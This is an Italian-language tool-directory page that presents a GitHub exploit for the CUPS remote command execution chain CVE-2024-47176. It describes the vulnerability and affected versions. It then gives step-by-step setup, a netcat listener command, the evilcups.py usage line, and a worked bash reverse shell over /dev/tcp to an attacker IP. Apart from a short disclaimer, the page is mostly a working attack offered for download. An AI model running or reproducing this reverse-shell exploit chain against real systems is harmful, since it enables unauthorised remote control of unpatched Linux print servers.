Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-47176 | Kitploit
Strumenti/GitHubGitHub/gumerzzzindo/cve-2024-47176
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlStrumento di Accesso Remoto
GitHubgumerzzzindo/cve-2024-47176

CVE-2024-47176

Vedi Repository
2 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-47176 — Esecuzione remota di comandi in CUPS

CVE CVSS Python Platform License

Solo a scopo educativo e per test di penetrazione autorizzati.


Sommario

  • Descrizione
  • Sistemi interessati
  • CVE correlate
  • Prerequisiti
  • Configurazione
  • Utilizzo
  • Esclusione di responsabilità

Descrizione

CUPS (Common UNIX Printing System) è un sistema di stampa open-source che gestisce stampanti di rete. CVE-2024-47176 prende di mira il demone cups-browsed, che si lega a INADDR_ANY:631 e si fida ciecamente dei pacchetti provenienti da qualsiasi sorgente.

Costruendo un pacchetto UDP malevolo che innesca una richiesta IPP Get-Printer-Attributes, un attaccante può indurre cups-browsed a collegarsi a un server controllato dall'attaccante — e, se combinato con le vulnerabilità di seguito, ottenere l'esecuzione arbitraria di comandi remoti.


Sistemi interessati

ComponenteCondizione
cups-browsedIn ascolto su UDP 631 (predefinito)
CUPS < 2.4.11Versioni non aggiornate
Sistemi Linux con CUPS espostoPorta 631 raggiungibile dall'attaccante

CVE correlate


Prerequisiti

  • Macchina target con porta 631 (IPP/UDP) esposta
  • Python 3.x sulla tua macchina d'attacco
  • nmap (opzionale, per ricognizione)
  • Un listener netcat per la reverse shell

Configurazione

1. Clona il repository:

root@kitploit:~
git clone https://github.com/gumerzzzindo/cve-2024-47176.git
cd cve-2024-47176

2. Installa la dipendenza Python richiesta:

root@kitploit:~
pip install ippserver

3. Avvia un listener sulla tua macchina:

root@kitploit:~
nc -lvnp <PORT>

Utilizzo

root@kitploit:~
./evilcups.py <ATTACKER_IP> <TARGET_IP> "<COMMAND>"

Esempio — reverse shell:

root@kitploit:~
./evilcups.py 10.10.10.10 10.10.11.40 "bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'"

Dopo aver eseguito l'exploit, innesca un lavoro di stampa sul target (oppure attendi un controllo automatico) per eseguire il payload.


Esclusione di responsabilità

Questo repository è inteso esclusivamente a scopo educativo e per ricerca di sicurezza autorizzata. Usare questo strumento contro sistemi che non possiedi o per i quali non hai un esplicito permesso scritto di test è illegale e non etico.

Scarica lo strumento
CVEDescrizione
CVE-2024-47176cups-browsed si fida di qualsiasi pacchetto UDP sulla porta 631
CVE-2024-47076libcupsfilters non sanifica gli attributi IPP
CVE-2024-47175libppd inietta dati non sanificati nei file PPD
CVE-2024-47177cups-filters consente l'esecuzione di comandi tramite PPD